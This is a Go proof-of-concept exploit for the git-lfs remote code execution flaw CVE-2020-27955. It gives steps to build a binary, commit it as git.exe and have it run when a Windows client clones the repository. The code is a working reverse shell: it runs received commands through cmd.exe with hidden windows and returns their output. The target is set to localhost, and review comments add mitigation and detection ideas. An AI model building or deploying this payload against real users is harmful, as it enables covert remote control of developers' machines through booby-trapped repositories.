/*
Go PoC exploit for git-lfs - Remote Code Execution (RCE) vulnerability CVE-2020-27955
git-lfs-RCE-exploit-CVE-2020-27955.go

Discovered by Dawid Golunski
https://legalhackers.com
https://exploitbox.io

Affected (RCE exploit):
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / SmartGit / SourceTree etc.
Basically the whole Windows dev world which uses git.

Usage:
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
Save & commit as git.exe

The payload should get executed automatically on git clone operation.
It spawns a reverse shell, or a calc.exe for testing (if it couldn't connect).

An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

git lfs track "*.dat"
echo "fat bug file" > lfsdata.dat
git add .*
git add *
git commmit -m 'git-lfs exploit' -a

Check out the full advisory for details:
https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

PoC video at: https://youtu.be/tlptOf9w274

** For testing purposes only **
*/

// NOTE(review): defensive context for readers of this PoC.
//
// What the header describes: a binary committed to a repository under the
// name git.exe is run when a Windows client clones the repository and
// git-lfs is invoked. This is consistent with git-lfs launching "git" by
// bare name while the Windows executable search includes the current
// directory (the fresh working tree) -- confirm the exact root cause
// against the advisory linked above.
//
// Mitigation: update git-lfs, including the copies bundled with Git clients
// and IDEs, to a release that contains the fix for CVE-2020-27955; fixed
// version numbers are not stated on this page, so take them from the
// advisory or the vendor release notes.
//
// Detection ideas grounded in what this file does:
//   - a process named git whose image path lies inside a repository working
//     tree rather than the Git installation directory, typically with
//     git-lfs as its parent;
//   - that process spawning "cmd /C ..." children with hidden windows, or
//     "calc" (the PoC's harmless fallback marker);
//   - an outbound TCP connection opened by that process;
//   - repositories that track an executable named git at their root.
//
// Build note: syscall.SysProcAttr has a HideWindow field only on Windows,
// so this file compiles only with GOOS=windows.

package main

import (
	"net"
	"os/exec"
	"bufio"
	"syscall"
)

// revsh dials host over TCP and, once connected, runs every newline-terminated
// line it receives as a "cmd /C" command, writing the combined stdout/stderr
// of each command back over the same connection. If the dial fails it runs
// "calc" once as a visible, harmless proof-of-execution and returns.
//
// host is passed straight to net.Dial, so it is a "host:port" string.
func revsh(host string) {

	c, err := net.Dial("tcp", host)
	if nil != err {
		// Conn failed
		// net.Dial is expected to return a nil Conn together with a non-nil
		// error, so this Close is a defensive guard that normally does not run.
		if nil != c {
			c.Close()
		}
		// Calc for testing purposes if no listener available
		// The error from Run is not checked; the fallback is best-effort.
		cmd := exec.Command("calc")
		cmd.Run()
		return
	}

	r := bufio.NewReader(c)
	for {
		// ReadString returns the line including its trailing '\n'; any read
		// error (including the peer closing the connection) ends the session.
		runcmd, err := r.ReadString('\n')
		if nil != err {
			c.Close()
			return
		}
		// The received line is handed to cmd.exe unmodified. HideWindow keeps
		// the child's console window from appearing on the desktop, which is
		// why process-creation telemetry is more useful than visual cues for
		// spotting this activity.
		cmd := exec.Command("cmd", "/C", runcmd)
		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
		// The command's error is discarded; only its combined output is sent
		// back, and the result of Write is not checked.
		out, _ := cmd.CombinedOutput()
		c.Write(out)
	}
}

// Connect to netcat listener on local port 1337
// The target is hard-coded to the loopback address, so as written the PoC
// only talks to a listener on the same machine.
func main() {
	revsh("localhost:1337")
}

--
Regards,
Dawid Golunski
https://legalhackers.com
https://ExploitBox.io
t: @dawid_golunski